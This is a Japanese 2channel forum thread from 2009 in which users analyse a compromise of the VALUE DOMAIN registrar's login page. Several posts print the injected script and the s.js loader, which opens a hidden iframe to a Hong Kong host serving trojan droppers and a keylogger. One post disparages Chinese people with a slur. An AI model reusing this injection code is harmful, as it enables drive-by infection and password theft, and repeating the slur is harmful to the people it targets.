1 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 06:18:47 0] VALUE DOMAIN:バリュードメイン https://www.value-domain.com/ サポート https://www.value-domain.com/support.php sb.xrea.com/forumdisplay.php?f=21 ◆前スレ VALUE DOMAINってどうよ? part32 pc11.2ch.net/test/read.cgi/hosting/1239851317/
29 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:22:28 0] >>6 ttp://1856317799:888/s.js のことかな 確かにパスーワード入力欄の下に埋め込まれてる 1856317799のIPアドレスは110.165.41.103 >>7 のIPと一致するけど、 正常なスクリプトか、ウイルスか、パス抜きか・・・ なんかよく分からんが、ログインするのはヤメとくか
30 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:29:50 0] なんだかなあ・・・ あっちもこっちもボロが出てるなぁ・・・
31 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:31:42 0] >>29 これか・・・ <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "http://1856317799:888/s.js"; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT> さっきログインしてしまった・・・orz
32 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:41:57 0] s.jsの中身 /*dsadasdadasdasdasdas*/ if(document.cookie.indexOf(”O=”)==−1) { var js = document.createElement(’iframe’); js.src = ”http:¥/¥/0x6EA52967:888/dir/show.php”; js.width=0; js.height=0; try {document.getElementsByTagName(’head’)[0].appendChild(js);} catch(exp){} js = null; var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie=”O=Yes;path=/;expires=”+expires.toGMTString(); }/*dasdadadsadasdas*/
33 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:44:36 0] 何これpass抜きか何か?
34 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:45:36 0] safeweb.norton.com/report/show?name=110.165.41.103 Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。 見つかった脅威の合計: 8 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/d6.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/en.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/d7.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/d9.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/fd.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/wa.dll 脅威名: Trojan.Dropper 場所: tp://110.165.41.103:888/dir/yg.dll 脅威名: Bloodhound.Exploit.193 場所: tp://110.165.41.103:888/swf/ia115-2.swf
35 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:51:16 0] このセキュリティの甘さは何なんだお?
36 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:53:58 0] 完全に投げ出したか
37 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:22 P] 俺のガマン汁もそろそろ限界だ。
38 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:57 0] これは www.value-domain.com/ が乗っ取られたと解釈した方がいいのか?
39 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:05:00 0] wikiwikiもやられてるみたいだな。GENO系統だろ。 ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね?
40 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:01 0] どうりで今日はデジロ社員が2ch工作してない訳だw 多分今頃、事務所は修羅場なんだろw
41 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:59 0] かんべんしてよマジで IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない
42 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:13:29 0] 大丈夫かよデジロ
43 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:16:25 0] >>40 多分、社員はまだ気がついていないんじゃないかな javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね
44 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:27 0] もしパス抜かれてたら、パス変更したら大丈夫なの?
45 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:31 P] そもそも書き換えられたことが問題。
46 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:47 0] 一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考 差し替えたら取れなくなる資料は今のうちに取っておいて、 あとは原因追究、恒久的対応だろ
47 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:49 0] 初心者的質問ですまんのだが、>>29 にあるようなURLでどうして接続できるの? あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの? 教えてエロい人。
48 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 18:39:08 0] とりあえず、マスコミに報告だ。 そうでもしなきゃ、隠蔽するだろ、ここ。
49 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:40:48 0] >>47 1856317799 = 0x6EA52967 = 110.165.41.0
50 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:41:30 0] すまん、 1856317799 = 0x6EA52967 = 110.165.41.103 か
51 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:52:04 0] 0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。 ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったw スレ汚し失礼しました。
52 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 18:57:31 0] こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では まず使われないからな
53 名前:sage [2009/07/06(月) 19:00:14 0] >>51 なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。
54 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:01:56 0] 0xではじまるのは16進数
55 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:02:50 0] ところで、ns1-3.value-domain.com がひけないんだが、俺だけ?
56 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 19:04:48 0] 110.165.32.0/19は香港のアドレスブロックか 相変わらず中国人はクソ以下だな
57 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:05:58 0] ns2が引けないな。1と3は引ける
58 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:08:30 0] >>55 そんなのもう5月の終わりからだぞw
59 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:09:29 0] ネームサーバも酷いな、とりあえずenomにして あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく
60 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:11:26 0] しっかし、これだけ対応悪いと、 過去に隠蔽された情報漏洩やハッキング被害がイパーイあるのでは?と疑いたくなる。
61 名前:名無しさん@お腹いっぱい。 [2009/07/06(月) 19:13:01 0] とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。 GIGAZINE、期待してるよ。
62 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:14:05 0] >>51 1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103 0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる: 0x6EA52967 → 0x6E 0xA5 0x29 0x67 0x6E = 110 0xA5 = 165 0X29 = 41 0x67 = 103
63 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:17:27 0] >>62 もういいって ping 1856317799 とでも打てばすぐに分かることだし
64 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:19:21 0] 惰性のみでM調教受け続けてきましたがさすがにもう無理です。 ごめんなさいドSデジロご主人様。
65 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:20:43 0] ・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。
66 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:24:00 0] >>65 つ>>16 先月1日あたりからアナウンスも一切無くずっと放置だよ
67 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:28:58 P] とりあえず垢のパスは変えた方がいいのかな?どうなのかな?
68 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:31:50 0] おちおちコンパネにログインすらできんってどうよ 移管もできねーじゃん
69 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:32:13 0] >>66 これって死にッぱなし・・・じゃないよね? だったらHPもメールも動かなくなるわけだし。
70 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:35:33 0] >>69 orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。
71 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:44:32 P] 知らずにログインしてた… 念のためJavaSciprt無効化してからログインしてパスワード変更したよ。
72 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 19:57:50 0] >>67 コンパネのパスを抜かれるって事はxreaのログイン情報から メールのパスワードまで全部つながって見えるって事だから とりあえず、JavaSciprtをoffにしてパスワードを変更した。
73 名前:72 mailto:sage [2009/07/06(月) 20:04:17 0] 追加。 よく考えたらxreaどころじゃねぇ、 抜かれたパスワードからさらに他のパスワードに換えられたら、 こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。 ログイン履歴をメモしておかないとな。 自分が寝ているハズの時間のログイン記録があるかもよ。
74 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:07:31 0] わざわざ今ログインしてる人って頭XXXXX
75 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:15:16 0] 改ざんされてる割には あまり騒いでないな
76 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:27:01 0] JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では? つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。 今はログインせずに、アナウンスを待つよりほかない。
77 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:29:44 0] 他社で取得したco.jpドメイン運用しているんだけど、 NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと?
78 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:31:10 0] まさか本当にGENO系? それならvalue-domain.comのFTPパス抜かれたってことか 最悪だ
79 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:36:44 0] GENO系かどうかはわからないけど、login.phpが改竄されたってことは 少なくともftpの垢パスが漏れていると言う事実は変わらない。 もしかしたらもっと上位の垢パスの可能性だってある。
80 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 20:58:10 0] ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか これ、どう処理するんだろ 適当にパスワード変更してください、って告知して、また100日無料期間追加程度で終わるのかな
81 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 21:49:42 0] やばいよよばいよ
82 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 21:52:07 0] まだ直ってないの?
83 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:12:14 0] >>32 のs.jsって本当にあるね…… 俺、javascriptってよくわかんないんだけど、 ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと?
84 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:14:53 0] この先いったいどうなることやら
85 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:20:19 P] www.value-domain.com/login.php <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "1856317799:888/s.js "; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT> https://www.value-domain.com/login.php <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "1856317799:888/s.js "; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT> 当たり前だけ両方あるな
86 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:27:49 P] s.jsの中身 /*dsadasdadasdasdasdas*/ if(document.cookie.indexOf("O=")==-1) { var js = document.createElement('iframe'); js.src = "http:\/\/0x6EA52967:888/dir/show.php"; js.width=0; js.height=0; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie="O=Yes;path=/;expires="+expires.toGMTString(); }/*dasdadadsadasdas*/ http:\/\/0x6EA52967:888/dir/show.php ↓ 110.135.41.103/dir/show.php
87 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:31:58 0] To: 85-86 >>31-32 がなぜわざわざ全角にしたのか, >>34 がなぜhttpでなくtpにしたのか, 考えてみよう.
88 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:33:17 0] >>85 >>86 既出 上で書いてあることをいちいち書き込まなくてよろしい しかも香港鯖にリンクを貼るなや
89 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:40:35 0] ウィルスURLを張るのは普通に通報対象です
90 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:46:18 0] で、肝心のデジロは把握してるの?
91 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:49:31 0] 把握していないのでは? <script>〜</script>を削除するくらい一瞬で終わる
92 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:51:23 0] 誰かが魚拓とってくれたみたいだ。 ttp://s03.megalodon.jp/2009-0706-1843-51/https://www.value-domain.com/login.php
93 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:52:08 0] 試しに問題のURLを確認してみた 問題の飛ばされる先のm.htmに、ノーガードで突っ込んでみると、 XPだと、 ドライブ:/Documents and Settings/ユーザ名/Application Data のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか 詳細は不明 何かがやられているのは確かだ 実験するのは自己責任で
94 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:56:05 0] つーことは、ログインするとパスが抜かれるのではなく、 ログインページを開くだけで感染するってこと?
95 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:59:41 0] >>93 に追記 ログをおったら、Keyloggerを検知した やはりパスワード抜きで確定だと思う
96 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:06:19 0] 要は javascript 実行させない環境で見れば 問題ないのかな 普段はFireFox+ NoScriptで普段はjavascript 実行させないようにしてるけど・・・
97 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:07:53 0] >>95 に追記 カスペルスキーを実行させながら再実験するとこんな感じになった そんなスクリーンショット ttp://www.dotup.org/uploda/www.dotup.org209036.jpg これは酷い
98 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:12:33 0] login.phpに<script>を埋め込むことができるなら、 login.phpのログイン時の処理にも細工がしてある可能性もある JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難
99 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:13:36 P] >>93 踏んだけどなかったなぁ そもそもそのURL鯖落ちしてないか?
100 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:16:19 0] ttps://www.value-domain.com/login.php にアクセスするだけで感染?
101 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:19:14 0] >>98 確かにそうだね しかしそろそろドメインの更新できないと困る・・・ しかも他ではあんまり扱ってないドメインだから 移管するのも面倒だし
102 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:22:45 0] Windows以外のOSかVistaでアクセスした方がいいね
103 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:23:20 0] >>93 >>95 >>97 だけど、こうなるのは本当に全くなにも対策してない場合だけだと思う。完全にXPをノーガードの素の状態で試したから ちゃんと最新のセキュリティソフト入ってるなら大丈夫、だとは思う カスペルスキーを立ち上げた状態でウイルスらしき実行ファイルやったら、なんか防いでるっぽかった。ブラウザがフリーズしたけど m.htmのほうはこんな感じ、show.phpのほうは何も吐き出してこないから、何やってるか全く不明。 正直、なんともいえんけど、 とりあえず、実験に使ったPCは念を入れて、リカバリ中
104 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:26:20 0] >>101 ccTLDは基本的に移管できないよ 認証鍵があるtvは移管できるかもしれないけど
105 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:27:24 0] >>102 HDDはずしてubuntuをCD-ROMブートで使うのが セキュリティ上いいのかしら(´・ω・`) Winのセキュリティソフトもすぐ対応してくれないと 意味ないし・・・
106 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:28:31 0] avastは検出してくれないなぁ〜 このキーロガーは、VDのパスを狙っているのではなく、 VD利用者が日頃入力するパスを狙ってるってことかな?
107 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:35:44 0] GENO系統ならフラッシュかPDFで感染させてFTPパスを抜いてそのパス使ってサイトの改竄する。
108 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:42:28 0] >>102 phpの内部処理まではサーバのほうで処理することでこっちはなにも見れないから、そこまで改ざんということなら、もうOS関係ないと思う ログインすることそれ自体が危険
109 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:47:00 O] 夕方ログインした もう、手遅れだろうから 全部諦める事にしたよ 大規模な改ざんが来そうだね
110 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:04:41 0] ログイン出来なきゃサポにも連絡できねえ。 問題が大きくなる前に対処しないとやばいんじゃね?
111 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:16:30 0] 今は消えてるみたい。やっと気づいたかな? でも、相変わらず報告なしだなぁ
112 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:20:36 0] 今北 何?ログインページにロガー仕込まれたの?マジで?? 今確認する分にはヘンなスクリプトは入ってなさげだけど… マジで仕込まれていたなら事は重大だなあ デジロは早急に今判っていることだけでもアナウンスすべき
113 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:25:57 0] 本当だ、いつのまにかなくなってる でも、>>92 で魚拓もうとられてるし、これはさすがにアナウンス無しってことはないと思・・・・・・いたい この期間にログインしてた人は、気がついたら自分のところ改ざんされてもおかしくないしな
114 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:26:31 0] 社員がここを見て気づくというオチ
115 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:30:46 0] 多分直接関係ないとはいえ、 お知らせ欄の「セキュリティ強化について」の文字が妙にむなしく感じる…
116 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:40:06 0] ユーザーが視認できるJavaScriptが削除されたにせよ、login.phpの内部処理が改竄されていたかどうかはユーザーには分からない。 一見対応されたかに見えても、プログラム内部の見えない部分まで確認したのかどうかは、VDのアナウンスを待つしかない。 login.phpが改竄されていたことには変わらない。 まだ危険は去っていないと考えるべきで、アナウンスがあるまでログインはおろか、 ttps://www.value-domain.com/login.php を開くことも控えるべき
117 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:44:17 0] DNSくらいは別に他使えばよかったけど、これはさすがにやっちまったなぁ…… VDは前、サーバー復旧できなくてサーバ丸ごと初期化したこともあったけど、 今回の問題はどこまで被害がでてるかわからないから、それなみのクラスの問題だな
118 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:52:06 P] ふぅ、 とりあえずjs切ってパス変えて、あどべ関連も一応最新チェックしといた。 俳人(廃人)の俺がここで一句 面倒くせぇ あぁ面倒くせぇ 面倒くせぇ
119 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:53:06 0] >>116 login.phpが書き換えられたというよりも、 login.phpから読み込まれる別のファイルなりデータベースなりが書き換えられてるような気がする。 ユーザー名、パスワード、挿入されたscriptタグが、同じ形に整えられてるからな。 よくあるSQLインジェクションみたいなもんじゃないかなー
120 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:53:39 0] 改竄されていたのは login.php だけだったのか? という疑問も残っている。 ログイン情報は、cookieに保存されるので、各ページのphpファイル内でcookieデータが送受信される。つーことは全phpファイルに改竄がなかったかチェックする必要がある。 どのページからでも情報漏洩の危険はあるってことだ。 さらに各phpファイルが内部でインクルードしていれば、そのファイルも全てチェックする必要がある。 このくらいできるよね>VD社員
121 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:59:41 0] とりあえずサポートフォームから 「事は重大だから最低でも朝イチでアナウンスが欲しい」 っと送っておいた 質問カテゴリ=利用前質問ならログイン無しでも送信できるしな 今の状況下でログインなんか怖くてできない
122 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:11:13 0] スレをちゃんと読まずに、>>72 、>>118 と同様、ログインしてパス変えてしまった login.phpの内部処理が改竄されていた場合、ログインしたユーザーには どんな被害があるの。whois情報が流出くらいならまだ許容できるんだけど
123 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:12:38 0] phpまでやられてたら、サーバでできることはほとんどなんでもできるよ
124 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:22:21 0] まあとにかく今は、VDの鯖がどの程度の被害を被ったのかアナウンスを待とうや phpの内部処理が改竄されている可能性を考慮すると、 ・JavaScriptをOFFにしてログインする ・以前のログイン情報がcookieに残っているユーザー(ログイン状態を維持しているユーザー)が、VDのサイトを開く ってのも控えたほうがいいと思われる。 つまりアナウンスを見に行くのですら気を使う必要があるかもね 既存のcookieを削除してから訪問するとか、ブラウザを変えるとか・・・
125 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:27:20 P] >アナウンスを待とうや そのアナウンスが、素直に出てくるとでも思っているのかい?
126 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 01:36:45 0] んなこた知るか 当然すべきことを期待しているだけだ 通信法、個人情報保護法etc・・・VDがどこまで法を犯すのかというのも楽しみではあるがね
127 名前:名無しさん@お腹いっぱい。 [2009/07/07(火) 01:50:45 0] 当然すべきことを期待しているだけだ(大爆笑)
128 名前:名無しさん@お腹いっぱい。 [2009/07/07(火) 02:02:31 0] たまたま見たらこんなことに・・・涙 ドメイン100個以上使っているのでドビックリしてます。
129 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 02:10:20 0] >>128 何度目のビックリですか?